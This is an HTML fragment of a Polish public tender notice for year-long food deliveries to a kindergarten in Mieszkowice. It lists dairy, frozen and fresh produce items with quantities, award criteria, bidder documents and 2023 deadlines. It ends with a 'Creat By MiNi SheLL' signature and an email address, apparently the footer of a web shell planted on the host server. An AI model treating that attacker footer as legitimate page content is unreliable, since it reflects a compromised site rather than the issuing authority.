class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Nabiał<br/>1.	Jogurt naturalny kubek	szt	100<br/>2.	Jogurt z owocem o zawartości cukru nie więcej niż 13g na 100g produktu	szt	1300<br/>3.	Jogurt naturalny grecki	szt	800<br/>4.	Masło Extra o zawartości 80% tłuszczu	szt	2400<br/>5.	Mleko 2%	szt	6000<br/>6.	Śmietana 30%	szt	20<br/>7.	Masło klarowane	szt	20<br/>8.	Ser twarogowy ziarnisty ze śmietanka zawartość tłuszczu 5%	szt	800<br/>9.	Ser żółty o zawartości tłuszczu mlekowego 48% mleka pasteryzowanego i podpuszczki	kg	200<br/>10.	Maślanka naturalna	szt	30<br/>11.	Serek homogenizowany smakowy	szt	1000<br/>12	Twaróg półtłusty krajanka tłuszcz 4% klasa I	kg	150<br/>13	Śmietana UHT 12% szt	400 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15530000-2 - Masło</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Mrożonki<br/>1.	Brokuł różyczki, mrożony	op	20<br/>2.	Kalafior różyczki, mrożony	op	30<br/>3.	Fasolka szparagowa zielona cięta mrożona	op	20<br/>4.	Marchew kostka mrożona	op	10<br/>5.	Marchew z groszkiem mrożona	op	20<br/>6.	Marchew mini mrożona	op	20<br/>7.	Mieszanka 7 składników (zupa jarzynowa) mrożona	op	30<br/>8.	Groszek zielony, mrożony	op	20<br/>9.	Brzoskwinia mrożona	op	10<br/>10.	Mieszanka bukiet 3 składnikowy mrożony	op	40<br/>11.	Mieszanka kompotowa bez pestki mrożona	op	200<br/>13	Maliny mrożone gatunek I	op	15<br/>14.	Truskawka mrożona op	50<br/>15.	Wiśnia mrożona	op	50<br/>16.	Szpinak mrożony	op	15<br/>17.	Pyzy mięsem mrożone	op	30<br/>18.	Pierogi ruskie mrożone	op	30<br/>19.	Kopytka mrożone op	30<br/>20.	Pierogi leniwe mrożone	op	30<br/>21.<br/>22.	Mieszanka chińska mrożona<br/>Owoce lasu mrożone op<br/>op.	15<br/>30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Warzywa i owoce świeże , jaja, ziemniaki<br/>1.	Arbuz kg	150<br/>2.	Banan klasa jakości I	kg	300<br/>3.	Brokuł świeży klasa jakości I	kg	15<br/>4.	Brzoskwinia klasa jakości I	kg	25<br/>5.	Burak czerwony ćwikłowy	kg	450<br/>6.	Cebula biała kg	80<br/>7.	Cukinia	kg	15<br/>8.	Cytryna	kg	60<br/>9.	Czosnek	szt	30<br/>10.	Botwina pęczek	szt	50<br/>11.	Gruszka	kg	100<br/>12.	Jabłko	kg	2500<br/>13.	Kalafior	szt	60<br/>14.	Kalarepa	szt	150<br/>15.	Kapusta biała	szt	100<br/>16.	Kapusta młoda sezonowo	szt	80<br/>17.	Kapusta czerwona szt	80<br/>18.	Kapusta kiszona	kg	100<br/>19.	Kapusta pekińska	szt	80<br/>20.	Kiwi	szt	600<br/>21.	Koperek zielony	szt	80<br/>22.	Maliny porcjowane op	30<br/>23.	Mandarynka	kg	100<br/>24.	Marchew	kg	400<br/>25.	Nektarynka	kg	40<br/>26.	Ogórek gruntowy	kg	100<br/>27.	Ogórek zielony	kg	180<br/>28.	Papryka	kg	120<br/>29.	Pieczarki	kg	100<br/>30.	Pietruszka korzeń	kg	100<br/>31.	Pietruszka zielona	szt	300<br/>32.	Pomarańcza	kg	80<br/>33.	Pomidor świeży	kg	200<br/>34.	Por świeży	szt	120<br/>35.	Sałata	szt	60<br/>36.	Sałata lodowa	szt	60<br/>37.	Seler	kg	320<br/>38.	Śliwka świeża	kg	30<br/>39.	Truskawka polska	kg	50<br/>40.	Khaki	kg	50<br/>41.	Ziemniak jadalny młody kg	2500<br/>42.	Ziemniak jadalny	kg	4500<br/>43.	Włoszczyzna młoda-pęczek	szt	50<br/>44.	Szczypior	szt	150<br/>45.	Rzodkiewka	szt	300<br/>46.	Rzodkiew biała	kg	60<br/>47.	Ogórek małosolny	szt	50<br/>48.	Ogórek kiszony	szt	100<br/>49.	Jaja świeże	szt	3500<br/>50.	Fasola sucha	szt	30<br/>51.	Groch suszony	szt	50 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03100000-2 - Produkty rolnictwa i ogrodnictwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03212100-1 - Ziemniaki</p> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">03222000-3 - Owoce i orzechy</p> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Ryby </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym- Zamawiający nie stawia warunku<br/>w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów-Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej- Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej- Zamawiający nie stawia warunku w powyższym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie art.<br/>108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. , – wzór stanowi załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz dokumentów składających się na ofertę:<br/>1) formularz ofertowy – zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ;<br/>2) oświadczenie wykonawcy wskazujące części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, wraz<br/>z podaniem nazw ewentualnych podwykonawców, jeżeli są już znani – zgodnie ze wzorem stanowiącym załącznik nr 1 do<br/>SWZ;<br/>3) oświadczenie wykonawcy składane na podstawie art. 117 ust. 4 ustawy Pzp (w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia) – zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ;<br/>4) oświadczenie, o którym mowa w art. 125 ust. 1, składane na podstawie art. 273 ust. 2 ustawy Pzp, zgodnie ze wzorem<br/>stanowiącym załącznik nr 2 do SWZ, w następującym zakresie:<br/>a) spełniania warunków udziału w postępowaniu określonych przez zamawiającego<br/>b) wstępnego potwierdzenia braku podstaw wykluczenia z postępowania na podstawie art. 108 ust. 1) ustawy Pzp;<br/>5) Odpowiednie pełnomocnictwo lub inne dokumenty potwierdzające umocowanie do reprezentowania wykonawcy, gdy w<br/>imieniu wykonawcy działa osoba, której umocowanie nie wynika z dokumentów takich jak odpis lub informacja z KRS,<br/>CEiDG, lub innego właściwego rejestru, z zastrzeżeniem § 13 ust. 1 i 2 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (t.j. Dz. U. 2020 poz. 2415. Powyższe ma zastosowanie<br/>również do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6) zobowiązanie i oświadczenie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeżeli wykonawca w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu, zamierza polegać na zdolnościach innych podmiotów. Wzór dokumentu<br/>stanowi załącznik nr 4 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektem umowy, który stanowi załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-24 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert za pośrednictwem strony https://platformazakupowa.pl/pn/mieszkowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-24 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com